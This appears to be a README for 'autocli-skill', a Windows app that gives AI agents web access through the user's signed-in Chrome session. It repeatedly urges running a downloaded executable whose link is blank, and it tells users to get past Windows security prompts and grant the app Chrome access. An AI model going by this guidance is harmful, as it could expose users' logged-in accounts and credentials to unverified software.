autocli-skill helps your AI agent reach live information from the web without extra setup. It can use your Chrome login session to fetch current data from many sites, including Bilibili, Zhihu, Twitter/X, YouTube, Weibo, Reddit, Facebook, Instagram, TikTok, Notion, Cursor, and more.
Use it when you want your agent to:
- look up live web data
- read content from sites you already use
- avoid manual copy and paste
- work without API keys
- use your existing browser session
To use autocli-skill on Windows, visit this page to download:
On the Releases page:
- Open the latest release
- Download the Windows file
- Run the file on your PC
- Follow the on-screen steps
If Windows asks for permission, choose the option that lets the app run.
Use a Windows PC with:
- Windows 10 or Windows 11
- Google Chrome installed
- An active Chrome profile with the sites you want to access
- An internet connection
- Enough free space for the app and browser data
For the best result:
- keep Chrome signed in
- close extra browser windows if they cause confusion
- use the same Chrome profile each time
autocli-skill connects your AI agent to your browser session. It reads web content through Chrome, so the agent can use pages you already have access to.
The flow is simple:
- You run the app on Windows
- The app looks at your Chrome session
- Your agent sends a natural language request
- The app fetches the needed page or data
- The agent uses that data in its response
This is useful for:
- current news and posts
- social media content
- saved notes in Notion
- public pages and profile data
- search results from many web platforms
- Install Google Chrome if you do not have it
- Sign in to the sites you want your agent to use
- Open the Releases page
- Download the latest Windows build
- Run the downloaded file
- Let the app use your Chrome session
- Connect it to your AI agent if your setup needs that step
If you already use ClaudeCode, OpenClaw, or Agent, add autocli-skill as the web access layer for live browsing tasks.
You can give simple requests in plain language, such as:
- get the latest video from a YouTube channel
- read a post from Reddit
- pull recent updates from X
- check a creator page on Bilibili
- open a saved note in Notion
- find public info on Weibo or Zhihu
- read comments or page content from supported sites
You do not need to type site-specific commands for normal use. Ask for the page or content you want, and the agent handles the rest.
autocli-skill reuses your Chrome login session. That means it can access sites where you are already signed in, without asking for API keys.
Keep these points in mind:
- use the Chrome profile that has your logins
- stay signed in to the services you want to use
- if a site signs you out, sign in again in Chrome
- if content does not load, refresh the page in Chrome and try again
This setup helps with sites that do not offer easy public APIs or where login is required.
autocli-skill is built for broad web access across many common sites, including:
- Bilibili
- Zhihu
- Twitter/X
- YouTube
- TikTok
- Notion
- Cursor
- 55+ other platforms
It works best on pages that load in Chrome and allow normal browser access.
If the app does not find the right page, try this:
- Open the site in Chrome first
- Sign in if needed
- Make sure the page loads fully
- Run the app again
- Give the agent a clear request
If your browser has many profiles:
- use one profile for this app
- keep it separate from work or personal profiles if needed
- avoid switching profiles while the app is running
Here are some simple ways people can use autocli-skill:
- check a creator’s newest post before writing a reply
- compare live comments from several platforms
- read updates from a Notion workspace
- collect social links for research
- pull current video details from YouTube
- verify a public profile on X or Instagram
- gather source material for a report
When you start the app for the first time:
- Windows may show a security prompt
- Chrome may ask for access or login approval
- the app may take a moment to connect
- your agent may need one test request before it works smoothly
If the app opens and closes too fast:
- run it again
- make sure Chrome is open
- check that you downloaded the correct Windows file from Releases
If your AI agent supports external tools, point it to autocli-skill as the web fetch layer. Then ask for live web tasks in natural language.
Examples:
- fetch the latest tweet from a public account
- open this Notion page and read the top section
- get the newest video from this channel
- check the current posts on this profile
- find recent comments on this thread
Keep requests short and specific. Clear requests give better results.
Visit this page to download the Windows release:
Then:
- open the newest release
- download the Windows file
- double-click the file to run it
- allow Chrome access if prompted
- connect it to your AI agent if needed
If the app does not work as expected:
- confirm Chrome is installed
- confirm you are signed in to the right site
- make sure the page is reachable in Chrome
- try again after refreshing the page
- restart the app and Chrome
- check that you downloaded the latest release
If the app cannot read a page:
- open the page directly in Chrome
- wait for the page to finish loading
- remove pop-ups or sign-in prompts
- try a simpler request first
If your agent gives no result:
- use a more direct request
- name the site and page
- ask for one item at a time
For smoother use:
- keep Chrome updated
- use one browser profile for your agent tasks
- stay signed in to the platforms you use most
- give clear requests
- start with public pages before trying locked content
autocli-skill fits users who want live web access inside their AI workflow without extra account setup